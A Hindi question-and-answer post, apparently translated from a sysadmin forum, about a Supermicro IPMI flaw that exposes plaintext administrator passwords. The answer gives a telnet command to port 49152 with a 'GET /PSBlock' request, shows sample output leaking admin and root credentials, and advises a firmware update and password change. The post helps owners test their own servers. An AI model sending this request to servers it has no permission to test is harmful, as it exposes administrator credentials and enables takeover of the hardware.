मेरे पास IPMI के साथ कुछ सुपरमाइक्रो सर्वर हैं, और जैसा कि इस ब्लॉग में वर्णित है ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ) के लिए एक महत्वपूर्ण भेद्यता है किसी भी दूरस्थ स्थान से सादा व्यवस्थापक पासवर्ड प्राप्त करें।
अगर मेरे सर्वर मदरबोर्ड से छेड़छाड़ की जाती है तो कैसे जांच करें?
जवाबों:
बस पोर्ट 49152 में IPMI IP पते पर टेलनेट और एक विशिष्ट GET अनुरोध करें। यदि आप समझौता कर रहे हैं तो आपको अपने उपयोगकर्ता और पासवर्ड प्राप्त करने चाहिए।
telnet server.example.com 49152
कनेक्शन मांगने GET /PSBlockऔर परिणाम देखने के बाद, यह कुछ इस तरह होना चाहिए:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
उत्तर:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
इस समस्या को हल करने के लिए IPMI फर्मवेयर को नवीनतम संस्करण में अपडेट करें। फर्मवेयर आपके IPMI नियंत्रक के लिए विशिष्ट है, इसलिए आपको सुपरमाइक्रो वेबसाइट में निर्दिष्ट होना चाहिए।
फिर फर्मवेयर अपडेट करने के बाद अपने पासवर्ड बदलें ।